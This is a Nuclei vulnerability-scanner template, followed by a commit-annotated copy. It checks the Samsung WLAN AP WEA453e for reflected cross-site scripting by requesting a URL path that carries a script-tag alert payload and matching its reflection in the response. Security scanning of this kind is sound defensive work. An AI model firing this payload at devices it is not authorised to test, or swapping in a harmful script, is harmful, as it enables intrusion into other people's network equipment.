nuclei-templates/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml

id: samsung-wlan-ap-xss

info:
  name: Samsung Wlan AP (WEA453e) XSS
  author: pikpikcu
  severity: medium
  reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
  tags: xss,samsung,xss
requests:
  - method: GET
    path:
      - "{{BaseURL}}/%3Cscript%3Ealert(document.domain)%3C/script%3E"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "/tmp/www/<script>alert(document.domain)</script>"
        part: body

      - type: status
        status:
          - 404

      - type: word
        words:
          - "text/html"
        part: header
Create samsung-wlan-ap-xss.yaml 2021-02-15 05:53:18 +00:00			`id: samsung-wlan-ap-xss`

			`info:`
			`name: Samsung Wlan AP (WEA453e) XSS`
			`author: pikpikcu`
			`severity: medium`
			`reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/`
misc changes 2021-02-15 15:59:12 +00:00			`tags: xss,samsung,xss`
Create samsung-wlan-ap-xss.yaml 2021-02-15 05:53:18 +00:00			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/%3Cscript%3Ealert(document.domain)%3C/script%3E"`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
			`- "/tmp/www/<script>alert(document.domain)</script>"`
			`part: body`
misc changes 2021-02-15 15:59:12 +00:00
Create samsung-wlan-ap-xss.yaml 2021-02-15 05:53:18 +00:00			`- type: status`
			`status:`
			`- 404`
misc changes 2021-02-15 15:59:12 +00:00
			`- type: word`
			`words:`
			`- "text/html"`
			`part: header`